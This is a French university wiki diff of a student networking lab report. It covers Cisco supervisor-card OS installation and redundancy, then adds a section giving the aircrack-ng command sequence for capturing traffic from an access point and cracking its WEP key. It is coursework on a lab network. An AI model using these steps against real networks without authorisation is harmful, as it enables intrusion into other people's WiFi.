TP sysres IMA2a5 2020/2021 G3 : Différence entre versions
(Page créée avec « Problèmatique: Configuration et installation des iOS des cartes de supervision Etape 1: Vérifier l'existance d'OS sur les deux cartes. Pour cela, nous avons utilisé... ») |
|||
Ligne 18 : | Ligne 18 : | ||
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. | Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. | ||
− | boot | + | boot |
− | sh ver | + | sh ver |
Etape 4: Vérificaton de la redondance | Etape 4: Vérificaton de la redondance | ||
Ligne 25 : | Ligne 25 : | ||
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active | La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active | ||
− | enable | + | enable |
− | dir ? | + | dir ? |
Nous visualisons les disk des deux cartes via la première. On peut voir la dénomination 'slave' comme préfixe des noms de répertoire | Nous visualisons les disk des deux cartes via la première. On peut voir la dénomination 'slave' comme préfixe des noms de répertoire | ||
Remarque: Nous avons ajouté des modules présents sur l'ancien chassie. La carte principale de supervision les listes avec 'sh module' | Remarque: Nous avons ajouté des modules présents sur l'ancien chassie. La carte principale de supervision les listes avec 'sh module' | ||
+ | |||
+ | --------------------------------------------------------------------------------------------------------------------------------------------------- | ||
+ | == Cassage de clef WEP d’un point d’accès WiFi == | ||
+ | |||
+ | Installation du logiciel: | ||
+ | |||
+ | <code> apt-get install aircrack-ng </code> | ||
+ | |||
+ | Trouver la carte wifi: | ||
+ | |||
+ | <code> ip l </code> | ||
+ | |||
+ | Démarrer la carte wifi avec le logiciel: | ||
+ | |||
+ | <code> airmon-ng start wlx40a5ef0s98al </code> | ||
+ | |||
+ | Le logiciel renome la denommination du périphérique. On peut le retrouver avec: | ||
+ | |||
+ | <code> airmon-ng </code> | ||
+ | |||
+ | Trouver le bssid de cracotte03: | ||
+ | |||
+ | <code> airodump-ng -c 9 wlan0mon </code> | ||
+ | |||
+ | -c correspond à la fréquence | ||
+ | |||
+ | On utilise le bssid pour filtrer et mettre les données dans un fichier: | ||
+ | |||
+ | <code> airodump-ng -c 9 --bssid 04:DA:D2:9C:50:52 wlan0mon -w data </code> | ||
+ | |||
+ | Décriptage de la clé: | ||
+ | |||
+ | <code> aircrack-ng -b 04:DA:D2:9C:50:52 data*.cap </code> | ||
+ | |||
+ | |||
+ | == Cassage de mot de passe WPA-PSK == |
Version du 4 novembre 2020 à 16:49
Problèmatique: Configuration et installation des iOS des cartes de supervision
Etape 1: Vérifier l'existance d'OS sur les deux cartes.
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes.
-> 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3) -> 2ème carte: OS absent
Etape 2: Copie du fichier d'OS
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la premiere carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxieme carte de supervision.
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&éé-33.SXI6.bin disk0:
Etape 3: Reboot de la deuxième carte
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur.
boot sh ver
Etape 4: Vérificaton de la redondance
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active
enable dir ?
Nous visualisons les disk des deux cartes via la première. On peut voir la dénomination 'slave' comme préfixe des noms de répertoire
Remarque: Nous avons ajouté des modules présents sur l'ancien chassie. La carte principale de supervision les listes avec 'sh module'
Cassage de clef WEP d’un point d’accès WiFi
Installation du logiciel:
apt-get install aircrack-ng
Trouver la carte wifi:
ip l
Démarrer la carte wifi avec le logiciel:
airmon-ng start wlx40a5ef0s98al
Le logiciel renome la denommination du périphérique. On peut le retrouver avec:
airmon-ng
Trouver le bssid de cracotte03:
airodump-ng -c 9 wlan0mon
-c correspond à la fréquence
On utilise le bssid pour filtrer et mettre les données dans un fichier:
airodump-ng -c 9 --bssid 04:DA:D2:9C:50:52 wlan0mon -w data
Décriptage de la clé:
aircrack-ng -b 04:DA:D2:9C:50:52 data*.cap